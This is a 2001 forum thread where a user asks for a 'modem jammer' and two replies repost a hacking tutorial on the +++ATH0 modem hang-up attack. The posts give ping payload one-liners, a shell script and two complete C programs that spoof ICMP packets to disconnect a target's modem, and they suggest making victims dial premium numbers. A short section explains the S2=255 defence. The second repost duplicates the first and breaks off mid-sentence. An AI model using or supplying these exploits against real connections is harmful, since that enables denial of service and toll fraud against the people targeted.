-
December 12th, 2001, 11:39 AM
#1
Junior Member
modem jammer
Does anybody knows a good modem jammer program?
And if anybody know how a modem jammer exactly does, tell it to me too.
Thanks
-
December 12th, 2001, 08:41 PM
#2
Banned
I'm not sure what you mean my modem jammer.
There is no way to stop a phone trace from a modem.
There are some programs out there that can make older unprotected modems hang up. They do this by sending the hang up at command in a ping. Fortunately that sort of tech is obsolete now, most new modems won't accept at commands over tcp/ip anymore.
-
December 12th, 2001, 08:59 PM
#3
Wasn't that the +++ ATH0 bug?
Allen: If you mean to control someone's modem over the internet, I'm sorry, it's not really possible unless you have some sort of remove control on their system already. Are you talking about a direct modem-to-modem connection? Could you give more information?
If you mean your *own* modem, I suggest AirGap™, the 100% secure solution, putting a large amount of air between your phone/lan cord and your modem/NIC card. It's free too! And almost 100% secure against remote attacks.
[HvC]Terr: L33T Technical Proficiency
-
December 12th, 2001, 09:14 PM
#4
oddvector is right, the modemjammer is obsolete.
-
December 13th, 2001, 12:30 AM
#5
Ankit Fadia wrote this ages ago..Its probally outdated now with all the winmodems out now...anyway here:
A little more than a year ago, I was really addicted to IRC’ing and chatting using IRC clients and Chatting software. There was a time when I used to connect to the Internet just to IRC. This addiction fortunately did not last long and I soon learnt how to get myself to stay away from chatting etc, however during this time, I had some very interesting experiences and even learnt a lot.
In this guide, I will explain some of these ‘pretty interesting’ stuff, which besides being interesting will also surely teach you one or two new things. This HT manual will answer a lot of your questions, some of them being; Controlling Modems Remotely. Sending Modems AT Commands remotely. How do I disconnect a person from the Internet, if I know his IP? How can I disconnect myself from the Internet? How do I control Modems Manually? Also, how to protect your Modem from these ATH attacks, and much much more.
Before I move on to the interesting stuff, I would first like to explain what exactly makes controlling modems remotely possible or in other words, what is the core or what is the loophole (well, no exactly a loophole.),which makes all modems connected to the Internet Vulnerable.
To understand the core, we need to know how the data packets travel through the Internet or through a Local Area Network or LAN. Let us assume, that your IP Address is xx.xx.xx.xx and the server you are connecting to has the IP: yy.yy.yy.yy Now, say you run a C program which creates a single data packet and sends it to yy.yy.yy.yy, then the packet, would take the following path to reach its destination.
C Program at Source -------Router --------Daemon at Destination’s Port
(xx.xx.xx.xx) (yy.yy.yy.yy)
However, the above is a simple description of the entire process, if we describe the process, more deeply, then it would be:
C Program at source -----Modem of Source --- Router ----- Modem of Destination ------ Destination Daemon
So, basically each packet goes through the modem at both the source and destination. Thus the thing to remember here is that all data go through the modems, which could also be modem commands. Read on for more details.
Now, you see, a system talks to or controls a modem by issuing Modem command, which are generally called AT commands. This was a pretty vague and incomplete description of what modem commands are. To fully understand them, read on.
More--->>
--------------------------------------------------------------------------------
Hayes, a long time ago, set down a standard for modem commands, which started to be followed by a lot of Modem Manufacturers and modems following this standard were called ‘Hayes Compatible’. This complete set of Modem Commands, which follows the Hayes Standard, is called the AT Command set.
Here, AT stands for Attention. It basically tends to say to the Modem, ‘OK, Mr Modem, you better pay attention as I have some commands for you to execute”. The ‘AT’ precedes all Modem commands with a few exceptions, which we will discuss later.
**********************
HACKING TRUTH: A very simple and basic example of an AT command, would be, the one which is issued when you dial into your ISP. You, see when you click on the ‘Connect’ Button, the DUN software sends the following command to your modem:
ATDT or ATDP command followed by the number you want to dial and enter.
Now, let us analyze various parts of the above command. The ‘AT’ tells the modem to pay attention. The second part tells the modem, what kind of dialing system to use. For Example, DT tells it to use dial by tone, while DP tells it to use pulse dial. And the last part is the number you want to dial.
NOTE: To issue commands to your modem, you need to be in Command mode of your communication package.
*********************
Your modem accepts commands only when it is in the command mode. A modem is always either in the command mode, or the on-line mode. When you boot up, your modem is by default in command mode. So, when your modem is in command mode, then all AT commands are considered to be commands, while in online mode, all commands are considered to be as data packets.
Now, we come to an interesting part. The above paragraph tells us that when we connect to the Internet, our modem is in the online mode and thus cannot accept any commands. So, this means that even if you know the IP Address of a person and send them a modem command string, then the modem will only treat it as normal data and will not react to it, as it is in online mode. So, for the modem to start accepting and start reacting to AT commands, it has to be switched to the command mode. This is where the escape sequence comes in.
When the modem is in the online mode, then it can be brought to the command mode by sending it the escape characters i.e. +++. Passing the escape characters will switch the modem to the command mode and it will start reacting to AT commands. On giving the escape character, the actual AT command need not have the string ‘AT’ and it need not end with ‘enter’.
************************
HACKING TRUTH: The modem can be returned to the on-line state after the escape sequence has been issued. To return the modem to the on-line state, you have to give the ATO command.
************************
This means, that if you know the IP Address of someone, then if you send the +++ string to it followed by the AT Modem command, then you could practically control it, remotely. You could disconnect the modem, change the Dial type, force it to dial a particular number etc etc.
More--->>
--------------------------------------------------------------------------------
Let me take an example to make it clearer. Now, H0 is the AT command, which instructs the modem to disconnect or hang-up. Now, normally, if you want to disconnect your own modem or a local modem, then you would issue the following command:
+++ATH0
This basically switched your modem from the online mode to the command mode, and then sends it the H0 command, which is the disconnect command and thus disconnects the modem.
This same command, if sent to a remote system, will disconnect it from the network!!!
Now, before I move on to how to implement this attack through a C program, let us see, how to do the same through ping.
The following command, works on most systems, but from the arguments, I believe it will not work on Win 9x machines.
ping -c 5 -p 2b2b2b415453323d32353526574f310d ip
For explanation of the above ping command, I suggest you read the man pages of your *nix box: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
$>man ping
Also, the following is a shell script, which does the same for you:
#!/bin/sh
ping -p 2b2b2b415448300d $*
NOTE: This exploit or the ATH0 attacks do not work on all modems. It is not true that all old modems are vulnerable or all new modems are safe, it basically depends on brand to brand. For more details about how to protect your modem from such attacks, read the section titled ‘Protection’ in this manual.
More --->>
--------------------------------------------------------------------------------
More on modems...
There is a C program, from PacketStorm, which spoofs ICMP packets and performs the same attack.
The way the exploit works is it hides escape/control sequences in a ICMP echo_request packet (it contains the string +++ATH0) the +++ sends the modem into escape mode (and if the guard time on the modem is set ridiculously low) it will go into command mode and you can issue it an ATH0 to hang up. It works on the reply, because it receives the echo_request packet, then duplicates the packet with a new timestamp and checksum, dest/source hosts and returns it to the sender, when it returns it the string is sent to the modem, and thus hanging it up. There are a few conditions that must be met for it to work (if you dont want to be vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to reply to one if it gets one
2) target computer must be using a modem (you can't hangup DS3s, althoughi suppose you could hangup telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess you can use your own address, but then the target knows where it came from)
In my experimenting, I have also devised various fun ways to use this program other than just nuking your buddy off IRC. In theory..it is possible to modify the program to do fun stuff like make the target call some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the modem hangup, pause for 6 seconds then call 5551212..this is fun for obvious reasons. Then the next variation I came up with is a smurf like implementation in which you could make a script to DoS a class C subnet, with the number of your least favorite company, since most company's have 800 numbers, not only does this cause chaos to the phone bank, but also
costs ~$.30 per call...but i don't condone any of those ideas of course, this is just for experimental/educational purposes only, if you fix your modems, none of this is possible, so get off your ass and fix it.
More --->>
--------------------------------------------------------------------------------
More on modems...
script kiddiez: here is your code... Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
/*
* gin.c
* jpester@engr.csulb.edu
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "Have some gin sucka" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1
)
? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "usage: %s <source host> <dest host> <num packets>\n[ http://www.rootshell.com/ ] \n\n", name
);
exit( 0 );
}
void banner( void )
{
printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
printf( "compiled for: %s\n\n", FRIEND );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
char *packet;
int total;
struct iphdr *ip;
struct icmphdr *icmp;
size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );
size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct
timeval );
int len = strlen( ginstring );
packet = ( char * )malloc( iphlen + icplen + len );
ip = ( struct iphdr * )packet;
icmp = ( struct icmphdr * )( packet + iphlen );
( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen
)],
( struct timezone * )NULL );
memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 )
);
ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = din.sin_addr.s_addr;
ip->check = in_chksum( ( u_short * )ip, iphlen );
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 )
) );
total = ( iphlen + icplen + timlen + len + 16 );
sendto( port, packet, total, 0,
( struct sockaddr * )&din, sizeof( struct sockaddr ) );
free( packet );
}
// stolen from smurf
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum + 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
More --->>
More on modems...
Also note: some machines seg fault when they run this, and setting the environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this code will probably come out all offset and break when you try to compile it...so just fix it, it compiles fine (i use g++ -O3 -o gin gin.c).
__________________________________________
Yet, another program, (a better one) from their Archive: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
/* Hi, this is basically a small C program to quickly use the +++AZH0 modem bug on a given target. This thing is handy because you do not have to go through the trouble of typing the ping string, and it spoofs, which is also quite handy
Anyway, use this to disconnect most modems on ANY OS on the internet by sending an ICMP_ECHO_REQUEST with the contents of +++AZH0. The modem gets it and (since it's an ICMP ECHO) sends the same packet back and resets. It can be patched by setting the modem register S2 to such a value that turns the command mode of the modem off (255 will do). The modem will NOT execute the commands in the packets anymore and function stable.
NOTE: Before you actually USE this program, turn your OWN command mode or else, your modem will RESET upon trying to send the packets away. Put the statement S2=255 somewhere in your modem CALL STRING. It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>
At least, it does so on my modem. Note that some modems will get into trouble with the command mode turned off. If this is the case, tough, you CANNOT use this program AND you ARE VULNERABLE to this attack.
This should be it, all you script kiddies, have fun. Do with this code wathever you want, it's way too simple and lame.
Have fun,
Scrippie
If you think this program is truly cool (which is not true) mail me at:
ronald.huizer@wxs.nl
The way to patch a modem has been added thanks to Ardrian Gonzales...
Some modems may disconnect when trying to use the patch.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define BUFFER 80
#define RESET "+++ATH0\x0d"
#define PATCH "+++ATH0H1TD112\x0d"
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);
unsigned short in_cksum(u_short *addr, int len);
int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned int type)
{
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
char *blah;
int rc;
int c;
int b=0;
switch(type)
{ case (0): { blah = RESET; break; }
case (1): { blah = PATCH; break; }
default: blah = RESET;
}
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)
{
if(b==strlen(blah)) b=0;
packet[c]=blah[b];
b++;
}
/* This is the IP header of our packet. */
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->id = htons(43210);
ip->frag_off = htons(0);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);
ip->ttl = 25;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = 0;
icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char **argv)
{
struct sockaddr_in dest_addr;
unsigned int i,sock,type;
unsigned long src_addr;
if(geteuid()!=0)
{
fprintf(stderr, "You must be ROOT in order to run this!\n");
return(-1);
}
printf("Modem Killer - Version 1.0b - Spoofable\n");
printf("By Scrippie\n");
if ((argc != 5)) {
printf("Use the following format:\n");
printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);
printf("Where type means the type of the modem crash.\n");
printf("---------------------------------------------\n");
printf("Type 0: Makes the modem hangup\n");
printf("Type 1: Patches a modem against attacks\n");
printf("---------------------------------------------\n");
printf("Greetz, Scrippie\n");
return(-1);
}
switch(atoi(argv[4]))
{
case (0): { type = 0; break; }
case (1): { type = 1; break; }
default:{ printf("WRONG type you idiot!\n"); return(-1); }
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr,"No RAW sockets available...\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("Now sending the modem kill...\n");
for (i = 0;i < atoi(argv[3]);i++)
{
if (killmodem(sock, src_addr, &dest_addr, type) == -1)
{
fprintf(stderr,"Cannot send packet...\n");
return(-1);
}
usleep(10000);
}
}
/********************************************\
*** Of course, no one has EVER seen this piece of networking code before... ***
\********************************************/
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
More --->>
--------------------------------------------------------------------------------
More on modems...
Protection
Well, protection from these attacks is quite simple. But, I do suggest that before you read this section, you should try the above attacks on yourself, and see whether you are vulnerable or not. Anyway, to protect your modem from ATH0 attacks, or in other words to prevent it from switching from online mode to command line mode, all you have to do is: Set your init string to: S2=255.
*******************
HACKING TRUTH: You can change the initialization settings of your modem, in two different ways-:
1.Through the Windows Registry (The Kewl, but long Way)
Go to, the following registry key and change the Settings to the Value you want it to be.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Modem\0000\Init
2.Through the Modems option in the Control Panel. (The shorter, but not so kewl method.)
Simply Click on: Start > Settings > Control Panel. Then right click on Modems Choose Properties > Configure > Connection > Advanced.
Then enter the string in the specified area.
*******************
This will make your modem safe from this kind of attack, as it will treat AT commands as data, due to the fact that it will remain in online mode and not switch to command mode. However, some very obsolete modems tend to remain unaffected from the above protection method and thus remain vulnerable. Also, I have heard that there are some Anti-Nuke protection software, which provide your system protection from ATH0 attacks. Try: www.anticode.com
And for complete information and documentation on Hayes Compatible AT commands, visit the following sites: www.modem.com and
www.modemhelp.com
More --->>
More on modems...
Modem Tips and Tricks
Remember the batch file Virus, that I showed how to code in one of my previous tutorials? Well, keeping in mind, the power of DOS exhibited in that manual, here is yet another trick which shows you how to dial a connection or connect to the Internet by a simple single line DOS command. The syntax of the command is: (Case Sensitive)
rundll rnaui.dll,RnaDial ConnectionName
For Example,
If the connection name, which I want to dial is: MTNL, then the command which will pop up the Connection Dial Box would be:
C:\windows> rundll rnaui.dll,RnaDial MTNL
If you want the ‘Make New Connection’ Dialog box to pop up, then use the following command:
C:\windows>rundll rnaui.dll,RnaWizard /1
-
December 13th, 2001, 12:32 AM
#6
Ankit Fadia wrote this ages ago..Its probally outdated now with all the winmodems out now...anyway here:
A little more than a year ago, I was really addicted to IRC’ing and chatting using IRC clients and Chatting software. There was a time when I used to connect to the Internet just to IRC. This addiction fortunately did not last long and I soon learnt how to get myself to stay away from chatting etc, however during this time, I had some very interesting experiences and even learnt a lot.
In this guide, I will explain some of these ‘pretty interesting’ stuff, which besides being interesting will also surely teach you one or two new things. This HT manual will answer a lot of your questions, some of them being; Controlling Modems Remotely. Sending Modems AT Commands remotely. How do I disconnect a person from the Internet, if I know his IP? How can I disconnect myself from the Internet? How do I control Modems Manually? Also, how to protect your Modem from these ATH attacks, and much much more.
Before I move on to the interesting stuff, I would first like to explain what exactly makes controlling modems remotely possible or in other words, what is the core or what is the loophole (well, no exactly a loophole.),which makes all modems connected to the Internet Vulnerable.
To understand the core, we need to know how the data packets travel through the Internet or through a Local Area Network or LAN. Let us assume, that your IP Address is xx.xx.xx.xx and the server you are connecting to has the IP: yy.yy.yy.yy Now, say you run a C program which creates a single data packet and sends it to yy.yy.yy.yy, then the packet, would take the following path to reach its destination.
C Program at Source -------Router --------Daemon at Destination’s Port
(xx.xx.xx.xx) (yy.yy.yy.yy)
However, the above is a simple description of the entire process, if we describe the process, more deeply, then it would be:
C Program at source -----Modem of Source --- Router ----- Modem of Destination ------ Destination Daemon
So, basically each packet goes through the modem at both the source and destination. Thus the thing to remember here is that all data go through the modems, which could also be modem commands. Read on for more details.
Now, you see, a system talks to or controls a modem by issuing Modem command, which are generally called AT commands. This was a pretty vague and incomplete description of what modem commands are. To fully understand them, read on.
More--->>
--------------------------------------------------------------------------------
Hayes, a long time ago, set down a standard for modem commands, which started to be followed by a lot of Modem Manufacturers and modems following this standard were called ‘Hayes Compatible’. This complete set of Modem Commands, which follows the Hayes Standard, is called the AT Command set.
Here, AT stands for Attention. It basically tends to say to the Modem, ‘OK, Mr Modem, you better pay attention as I have some commands for you to execute”. The ‘AT’ precedes all Modem commands with a few exceptions, which we will discuss later.
**********************
HACKING TRUTH: A very simple and basic example of an AT command, would be, the one which is issued when you dial into your ISP. You, see when you click on the ‘Connect’ Button, the DUN software sends the following command to your modem:
ATDT or ATDP command followed by the number you want to dial and enter.
Now, let us analyze various parts of the above command. The ‘AT’ tells the modem to pay attention. The second part tells the modem, what kind of dialing system to use. For Example, DT tells it to use dial by tone, while DP tells it to use pulse dial. And the last part is the number you want to dial.
NOTE: To issue commands to your modem, you need to be in Command mode of your communication package.
*********************
Your modem accepts commands only when it is in the command mode. A modem is always either in the command mode, or the on-line mode. When you boot up, your modem is by default in command mode. So, when your modem is in command mode, then all AT commands are considered to be commands, while in online mode, all commands are considered to be as data packets.
Now, we come to an interesting part. The above paragraph tells us that when we connect to the Internet, our modem is in the online mode and thus cannot accept any commands. So, this means that even if you know the IP Address of a person and send them a modem command string, then the modem will only treat it as normal data and will not react to it, as it is in online mode. So, for the modem to start accepting and start reacting to AT commands, it has to be switched to the command mode. This is where the escape sequence comes in.
When the modem is in the online mode, then it can be brought to the command mode by sending it the escape characters i.e. +++. Passing the escape characters will switch the modem to the command mode and it will start reacting to AT commands. On giving the escape character, the actual AT command need not have the string ‘AT’ and it need not end with ‘enter’.
************************
HACKING TRUTH: The modem can be returned to the on-line state after the escape sequence has been issued. To return the modem to the on-line state, you have to give the ATO command.
************************
This means, that if you know the IP Address of someone, then if you send the +++ string to it followed by the AT Modem command, then you could practically control it, remotely. You could disconnect the modem, change the Dial type, force it to dial a particular number etc etc.
More--->>
--------------------------------------------------------------------------------
Let me take an example to make it clearer. Now, H0 is the AT command, which instructs the modem to disconnect or hang-up. Now, normally, if you want to disconnect your own modem or a local modem, then you would issue the following command:
+++ATH0
This basically switched your modem from the online mode to the command mode, and then sends it the H0 command, which is the disconnect command and thus disconnects the modem.
This same command, if sent to a remote system, will disconnect it from the network!!!
Now, before I move on to how to implement this attack through a C program, let us see, how to do the same through ping.
The following command, works on most systems, but from the arguments, I believe it will not work on Win 9x machines.
ping -c 5 -p 2b2b2b415453323d32353526574f310d ip
For explanation of the above ping command, I suggest you read the man pages of your *nix box: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
$>man ping
Also, the following is a shell script, which does the same for you:
#!/bin/sh
ping -p 2b2b2b415448300d $*
NOTE: This exploit or the ATH0 attacks do not work on all modems. It is not true that all old modems are vulnerable or all new modems are safe, it basically depends on brand to brand. For more details about how to protect your modem from such attacks, read the section titled ‘Protection’ in this manual.
More --->>
--------------------------------------------------------------------------------
More on modems...
There is a C program, from PacketStorm, which spoofs ICMP packets and performs the same attack.
The way the exploit works is it hides escape/control sequences in a ICMP echo_request packet (it contains the string +++ATH0) the +++ sends the modem into escape mode (and if the guard time on the modem is set ridiculously low) it will go into command mode and you can issue it an ATH0 to hang up. It works on the reply, because it receives the echo_request packet, then duplicates the packet with a new timestamp and checksum, dest/source hosts and returns it to the sender, when it returns it the string is sent to the modem, and thus hanging it up. There are a few conditions that must be met for it to work (if you dont want to be vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to reply to one if it gets one
2) target computer must be using a modem (you can't hangup DS3s, althoughi suppose you could hangup telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess you can use your own address, but then the target knows where it came from)
In my experimenting, I have also devised various fun ways to use this program other than just nuking your buddy off IRC. In theory..it is possible to modify the program to do fun stuff like make the target call some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the modem hangup, pause for 6 seconds then call 5551212..this is fun for obvious reasons. Then the next variation I came up with is a smurf like implementation in which you could make a script to DoS a class C subnet, with the number of your least favorite company, since most company's have 800 numbers, not only does this cause chaos to the phone bank, but also
costs ~$.30 per call...but i don't condone any of those ideas of course, this is just for experimental/educational purposes only, if you fix your modems, none of this is possible, so get off your ass and fix it.
More --->>
--------------------------------------------------------------------------------
More on modems...
script kiddiez: here is your code... Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
/*
* gin.c
* jpester@engr.csulb.edu
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "Have some gin sucka" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1
)
? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "usage: %s <source host> <dest host> <num packets>\n[ http://www.rootshell.com/ ] \n\n", name
);
exit( 0 );
}
void banner( void )
{
printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
printf( "compiled for: %s\n\n", FRIEND );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
char *packet;
int total;
struct iphdr *ip;
struct icmphdr *icmp;
size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );
size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct
timeval );
int len = strlen( ginstring );
packet = ( char * )malloc( iphlen + icplen + len );
ip = ( struct iphdr * )packet;
icmp = ( struct icmphdr * )( packet + iphlen );
( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen
)],
( struct timezone * )NULL );
memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 )
);
ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = din.sin_addr.s_addr;
ip->check = in_chksum( ( u_short * )ip, iphlen );
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 )
) );
total = ( iphlen + icplen + timlen + len + 16 );
sendto( port, packet, total, 0,
( struct sockaddr * )&din, sizeof( struct sockaddr ) );
free( packet );
}
// stolen from smurf
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum + 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
More --->>
More on modems...
Also note: some machines seg fault when they run this, and setting the environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this code will probably come out all offset and break when you try to compile it...so just fix it, it compiles fine (i use g++ -O3 -o gin gin.c).
__________________________________________
Yet, another program, (a better one) from their Archive: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
